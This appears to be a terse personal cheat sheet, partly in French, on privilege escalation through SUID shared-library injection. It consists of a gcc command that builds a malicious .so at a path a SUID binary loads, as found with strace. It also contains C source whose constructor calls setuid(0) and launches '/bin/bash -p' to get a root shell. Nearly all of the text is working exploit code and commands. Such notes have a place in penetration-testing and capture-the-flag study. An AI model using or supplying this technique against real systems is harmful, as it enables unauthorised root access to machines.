suid injection
#include <stdio.h>
#include <stdlib.h>
toinject.c
gcc -shared -fPIC -o /home/user/.config/libcalc.so toinject.c #par exemple, en utilisant strace, on se rend compte que le binaire essaie de charger /home/user/.config/libcalc.so
toinject.c
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}